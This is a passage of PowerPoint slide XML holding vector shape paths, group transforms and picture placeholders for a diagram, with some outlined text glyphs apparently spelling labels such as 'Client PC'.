                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539645" y="79443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536657" y="86389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536551" y="86637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534383" y="89288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528805" y="92795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525304" y="93674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546025" y="93674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547347" y="92156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551052" y="84934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553699" y="75912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555229" y="65484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555287" y="65090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555811" y="52604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555303" y="40351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555225" y="39699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553748" y="29650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553669" y="29327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551128" y="20572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547482" y="13252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545923" y="11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80E37FE6-A841-8F7D-293B-E6F90D7B9FF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="963614" y="1609761"/>
            <a:ext cx="7321345" cy="3001147"/>
            <a:chOff x="841859" y="1608883"/>
            <a:chExt cx="7321345" cy="3001147"/>
          </a:xfrm>
        </p:grpSpPr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CDC9C471-4673-060C-3BB7-34CB378D0EA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6359" y="2386571"/>
              <a:ext cx="1682495" cy="897648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9BAEC201-57A0-DA5A-0173-2497EDE71BBF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404365" y="2420873"/>
              <a:ext cx="1584325" cy="792480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1584325" h="792480">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1584198" y="792099"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25908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36D8728-20D0-A213-8895-4E383AFE3A2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1963" y="3015996"/>
              <a:ext cx="1859280" cy="242315"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C17BB50A-0FD2-B3BE-B9F0-7D4069ADABD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3564890" y="3051175"/>
              <a:ext cx="1765935" cy="137160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1765935" h="137160">
                  <a:moveTo>
                    <a:pt x="0" y="137032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1765935" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="254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ED27E10E-4DB0-716C-387C-15D2CFE1F8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9215" y="2843783"/>
              <a:ext cx="1504188" cy="1182623"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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045AB316-57F1-FFBE-FCF9-204E7EE5E3C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5969253" y="2876550"/>
              <a:ext cx="1403985" cy="1080135"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1403984" h="1080135">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1403985" y="1079804"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="254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BA9BE684-2AB7-3071-778F-80CBCF5AC4A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2814978" y="3141050"/>
              <a:ext cx="1098550" cy="535305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1098550" h="535304">
                  <a:moveTo>
                    <a:pt x="716426" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="115161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382376" y="535164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1097954" y="414921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1097954" y="143952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716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ED77D7AD-3947-BB37-00A4-CB0FD8FDD751}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3198203" y="3283309"/>
              <a:ext cx="716915" cy="393065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="716914" h="393064">
                  <a:moveTo>
                    <a:pt x="713882" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="115161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="392905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112762" y="372582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357789" y="330243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602815" y="288751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685055" y="275203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707099" y="272662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716426" y="272662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713882" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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36E8BC0D-908A-5621-54CC-36A9CB66231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4978" y="3143590"/>
              <a:ext cx="1088628" cy="532624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65BDCE1A-E054-9BE5-2469-179EBC51C06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5228" y="2547684"/>
              <a:ext cx="1571044" cy="1300317"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF461180-2A44-72D9-6A31-6A86E2591BE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3312" y="2698185"/>
              <a:ext cx="496835" cy="550406"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C3C7A7AB-C286-B070-75C2-BE97D620D4B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7733" y="3318874"/>
              <a:ext cx="223830" cy="168509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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57E791B1-DFC6-90F1-653B-497A211B9148}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3275804" y="3865938"/>
              <a:ext cx="628015" cy="107314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="54655" y="2687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41872" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35164" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174" y="39155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="63542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18180" y="98429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41895" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53052" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78595" y="99739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80831" y="98723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="97639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43837" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39388" y="94432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13912" y="61893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13912" y="48074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14770" y="42135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43295" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="11538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76743" y="8241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70781" y="5961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60030" y="3341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54655" y="2687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="83316" y="82013"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82367" y="82013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77466" y="86416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73718" y="88764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71973" y="89803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60956" y="94116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54949" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="82013"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="83316" y="14090"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54587" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60392" y="15151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71278" y="19374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76766" y="22738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82299" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="14090"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="116899" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104229" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104229" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116899" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116899" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="156762" y="3838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142466" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142466" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156762" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156762" y="3838"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="155949" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="143279" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143279" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155949" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155949" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="223659" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="213495" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205662" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177494" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176863" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177523" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207907" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208157" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216657" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221558" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226233" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235154" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239513" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243782" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243782" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212660" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209114" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202700" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199922" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197573" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195156" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193319" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190459" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189759" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189759" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245273" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245273" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245087" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189752" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190205" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190301" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192582" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200622" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206020" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238137" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237006" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231496" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223659" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="243782" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="243104" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240914" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237210" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226821" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221649" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243782" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243782" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="238137" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="219571" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224585" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231202" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232873" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232919" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245087" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244756" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243206" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240623" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238137" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="279670" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266977" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266977" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="48684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283125" y="46042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286739" y="43851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294305" y="40442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297918" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327686" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326270" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="327686" y="39584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304761" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307494" y="40035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311718" y="41887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313344" y="43287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314473" y="45184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315557" y="46900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316302" y="49271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317093" y="55322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317296" y="58574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317296" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329989" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329989" y="46900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329749" y="46042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328049" y="40442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327926" y="40035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327843" y="39764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327686" y="39584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="313095" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="300515" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296179" y="28429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287710" y="32109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283622" y="34684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326270" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319306" y="29964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313095" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="369987" y="40261"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="357294" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357294" y="89442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359304" y="96081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367299" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373149" y="106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383041" y="106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385548" y="106219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391172" y="105406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393769" y="104887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395821" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380602" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378655" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378198" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374577" y="93258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370077" y="81629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369987" y="40261"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="396163" y="92852"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="395485" y="92852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394492" y="93258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392866" y="93777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390630" y="94387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388371" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386226" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="92852"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="396163" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="348734" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348734" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="369987" y="7948"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="357294" y="7948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357294" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369987" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369987" y="7948"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="497411" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="464144" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464144" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477491" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477491" y="67493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498044" y="67493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504006" y="66635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513447" y="63180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517535" y="60584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522007" y="56113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477491" y="56113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477491" y="15987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524105" y="15987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521668" y="13345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514599" y="8625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510895" y="7045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502516" y="5012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497411" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="524105" y="15987"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="494950" y="15987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498450" y="16280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503984" y="17500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515954" y="38161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515502" y="40848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494159" y="56113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522007" y="56113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523791" y="54329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525959" y="51032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529076" y="43445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529844" y="39313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529780" y="28722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528805" y="24183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524626" y="16551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524105" y="15987"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="598841" y="2687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="586080" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579372" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547708" y="32629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544208" y="46561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544208" y="63542"/>
                  </a:lnTo>
                  <a:lnTo>
